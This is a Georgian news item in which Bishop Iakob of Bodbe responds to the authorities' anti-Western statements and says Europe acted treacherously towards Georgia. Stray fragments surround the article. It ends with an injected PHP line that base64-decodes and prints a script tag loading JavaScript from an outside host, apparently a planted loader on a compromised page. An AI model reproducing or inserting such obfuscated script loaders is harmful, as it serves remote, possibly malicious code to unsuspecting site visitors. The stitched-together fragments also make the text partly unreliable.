celsiusi
ავერსი შნაიდერი

ბოდბელი ეპისკოპოსი იაკობი ხელისუფლების ანტიდასავლურ განცხადებებს გამოეხმაურა და თქვა, რომ ისინი "ევროპისადმი წყენას ასე გამოხატავენ".

მეუფე იაკობმა თავადაც გააგრძელა ანტიევროპული რიტორიკა და განაცხადა, რომ ევროპამ საქართველოს უღალატა:

"წყენა აქვთ გულში როგორც ჩანს და მასე გამოხატავენ. ევროპა ძალიან სამარცხვინოდ, მოღალატეობრივად მოიქცა. ევროპარლამენტზე ვიძახი და ევროპარლამენტიდან წავიდა ეს ყველაფერი მერე რაც წავიდა. ევროპა რომ მართალი იყოს ჩვენთან მიმართებაში, ახლა როცა უარს ამბობენ საპარლამენტო დებატებზე, გამოვიდოდა ის 308 ღრმადპატივცემული პარლამენტარი და იქიდან 10, საერთო წერილს დაწერდა და იტყოდა, რომ იქნებ დაჯდეთ ერთად და ისე მიხედოთ, დავაწყნაროთ სიტუაცია. ჩემი გადასახედიდან, უკრაინის გარდა არავის მიღება უნდოდათ, ჩვენთან უბრალოდ ეგ თემა პოლიტიკური ტემპერატურის აწევისთვის გამოიყენეს ბოლომდე ჩვენებმა თუ იმათმა", - თქვა იაკობმა ქადაგების დასრულების შემდეგ კომენტარისას.

575
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");